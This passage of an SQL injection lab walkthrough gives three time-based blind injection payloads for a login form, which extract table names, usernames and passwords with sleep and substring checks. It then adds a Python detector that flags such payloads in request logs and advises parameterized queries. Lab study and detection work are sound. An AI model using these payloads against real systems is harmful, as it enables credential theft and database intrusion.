Compared with Level 15, the single quote becomes a double quote plus a parenthesis.
– Query columns
uname=admin") and if(ascii(substr((select group_concat(table_name) from information_schema.tables limit 0,1),1,1))>10,sleep(5),1)#&passwd=111&submit=submit
– Query usernames
uname=admin") and if(ascii(substr((select group_concat(username) from users limit 0,1),1,1))>10,sleep(5),1)#&passwd=111&submit=submit
– Query passwords
uname=admin") and if(ascii(substr((select group_concat(password) from users limit 0,1),1,1))>10,sleep(5),1)#&passwd=111&submit=submit
You can also write a script as in Level 8; anyone who understands the basic principle can write one, so I won't construct it here…
😄
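Seen from the defending side, the requests above leave a recognizable trace. The following is an added example, not part of the original walkthrough: it scans POST bodies for the delay call, the character-extraction pattern and the `")` closure, then records whether the response was actually slow. The record format `(client, body, seconds)`, the 4-second threshold and the sample records are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, quote_plus

# Indicators taken from the payloads shown above.
INDICATORS = {
    "delay": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
    "char_extract": re.compile(
        r"\b(?:ascii|ord)\s*\(\s*(?:substr|substring|mid)\s*\(", re.I),
    # A quote directly followed by ')': the '")' closure this level relies on.
    "quote_paren_breakout": re.compile(r"""["']\s*\)"""),
}

def field_indicators(value):
    """Names of all indicators present in one decoded form field."""
    return {name for name, rx in INDICATORS.items() if rx.search(value)}

def analyze(records, slow_seconds=4.0):
    """Flag fields containing a delay call; note whether the delay was observed."""
    alerts = []
    for client, body, duration in records:
        for field, value in parse_qsl(body):  # also decodes %xx and '+'
            found = field_indicators(value)
            if "delay" in found:
                alerts.append({
                    "client": client,
                    "field": field,
                    "indicators": sorted(found),
                    # True means the injected SLEEP likely ran: input reached the query.
                    "delay_observed": duration >= slow_seconds,
                })
    return alerts

# uname value copied from the username payload above.
PAGE_VALUE = ('admin") and if(ascii(substr((select group_concat(username) '
              'from users limit 0,1),1,1))>10,sleep(5),1)#')
TAIL = "&passwd=111&submit=submit"

# Constructed records: (client, POST body, response time in seconds).
SAMPLE = [
    ("10.0.0.5", "uname=" + PAGE_VALUE + TAIL, 5.02),
    ("10.0.0.5", "uname=" + quote_plus(PAGE_VALUE) + TAIL, 0.03),
    ("10.0.0.9", "uname=alice&passwd=correct-horse&submit=submit", 0.02),
    ("10.0.0.9", "uname=bob&passwd=hunter2&submit=submit", 6.10),
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE):
        print(alert)
```

An alert with `delay_observed` set means the form field was concatenated into the SQL statement; the fix is a parameterized query, which makes the `")` closure inert.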